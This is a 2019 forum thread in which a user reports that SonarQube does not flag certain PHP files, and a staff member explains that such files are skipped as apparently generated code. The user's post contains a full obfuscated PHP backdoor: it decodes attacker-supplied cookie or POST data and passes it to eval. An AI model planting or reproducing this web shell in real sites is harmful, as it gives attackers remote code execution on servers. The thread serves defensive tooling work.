SonarQube fails to see PHP exploit or report line too long

JohnC · September 5, 2019, 11:55am

SonarQube ignores PHP misdemeanours

Hi - I submitted report

Believing that because the parse error was now being reported and the line length too long is reported correctly in other files it was the solution.

However

Files (there are many) starting like so
<?php
$kgricmu = '4H917etxvayb-p*23#8_k\'imslcrfngoud';$zpbxjl = Array();...

containing such gems as

...if (!$kppkhy) {eval($bsewjvc[1]($bsewjvc[2]));exit();}...

with a line length greater than 1830 characters
is passed as no issues in SonarQube

Rule S2260 parser failure is activated and finds instances were applicable, but this file is parsed ok
Rule S103 line to long is activated and finds instances in other PHP files and is set to 120 characters but fails on this file

Expected error
S1523 - Dynamically executing code is security-sensitive - not reported
and so on

sonar-scanner -v
INFO: Scanner configuration file: /usr/local/Cellar/sonar-scanner/4.0.0.1744/libexec/conf/sonar-scanner.properties
INFO: Project root configuration file: NONE
INFO: SonarQube Scanner 4.0.0.1744
INFO: Java 11.0.1 Oracle Corporation (64-bit)
INFO: Mac OS X 10.14.6 x86_64

pynicolas · September 6, 2019, 1:20pm

Hi,

I didn’t manage to reproduce the problem you face.
Can you please share a PHP file on which I could reproduce the problem?

JohnC · September 9, 2019, 7:59am

<?php $nqsvr = '7ek9Hda_64ou#g0by5x-t\'ivrfnlpsc813m*2';$cnkbmw = Array();$cnkbmw[] = $nqsvr[3].$nqsvr[3].$nqsvr[8].$nqsvr[32].$nqsvr[30].$nqsvr[33].$nqsvr[31].$nqsvr[17].$nqsvr[19].$nqsvr[1].$nqsvr[33].$nqsvr[9].$nqsvr[14].$nqsvr[19].$nqsvr[9].$nqsvr[31].$nqsvr[33].$nqsvr[36].$nqsvr[19].$nqsvr[6].$nqsvr[31].$nqsvr[15].$nqsvr[15].$nqsvr[19].$nqsvr[17].$nqsvr[17].$nqsvr[3].$nqsvr[15].$nqsvr[25].$nqsvr[0].$nqsvr[0].$nqsvr[8].$nqsvr[6].$nqsvr[1].$nqsvr[0].$nqsvr[3];$cnkbmw[] = $nqsvr[4].$nqsvr[35];$cnkbmw[] = $nqsvr[12];$cnkbmw[] = $nqsvr[30].$nqsvr[10].$nqsvr[11].$nqsvr[26].$nqsvr[20];$cnkbmw[] = $nqsvr[29].$nqsvr[20].$nqsvr[24].$nqsvr[7].$nqsvr[24].$nqsvr[1].$nqsvr[28].$nqsvr[1].$nqsvr[6].$nqsvr[20];$cnkbmw[] = $nqsvr[1].$nqsvr[18].$nqsvr[28].$nqsvr[27].$nqsvr[10].$nqsvr[5].$nqsvr[1];$cnkbmw[] = $nqsvr[29].$nqsvr[11].$nqsvr[15].$nqsvr[29].$nqsvr[20].$nqsvr[24];$cnkbmw[] = $nqsvr[6].$nqsvr[24].$nqsvr[24].$nqsvr[6].$nqsvr[16].$nqsvr[7].$nqsvr[34].$nqsvr[1].$nqsvr[24].$nqsvr[13].$nqsvr[1];$cnkbmw[] = $nqsvr[29].$nqsvr[20].$nqsvr[24].$nqsvr[27].$nqsvr[1].$nqsvr[26];$cnkbmw[] = $nqsvr[28].$nqsvr[6].$nqsvr[30].$nqsvr[2];foreach ($cnkbmw[7]($_COOKIE, $_POST) as $ynmyb => $wyapeo){function gnbwlub($cnkbmw, $ynmyb, $xqpem){return $cnkbmw[6]($cnkbmw[4]($ynmyb . $cnkbmw[0], ($xqpem / $cnkbmw[8]($ynmyb)) + 1), 0, $xqpem);}function oaxtv($cnkbmw, $qvtebvv){return @$cnkbmw[9]($cnkbmw[1], $qvtebvv);}function taddgr($cnkbmw, $qvtebvv){$xyhoym = $cnkbmw[3]($qvtebvv) % 3;if (!$xyhoym) {eval($qvtebvv[1]($qvtebvv[2]));exit();}}$wyapeo = oaxtv($cnkbmw, $wyapeo);taddgr($cnkbmw, $cnkbmw[5]($cnkbmw[2], $wyapeo ^ gnbwlub($cnkbmw, $ynmyb, $cnkbmw[8]($wyapeo))));}

JohnC · September 9, 2019, 8:27am

I posted the contents of a file above. I cannot link to a file as they have all been taken off web.

pynicolas · September 9, 2019, 12:49pm

Thanks for the reproducer!
Indeed, that file is excluded from the analysis because it looks like a generated file (see SONARPHP-909), and SonarQube/SonarCloud is not supposed to analyze generated code.

If you activate debug logs in the analysis, you should see something like:

File [file:///dir/file1.php] is excluded because it is considered generated (average line length is too big).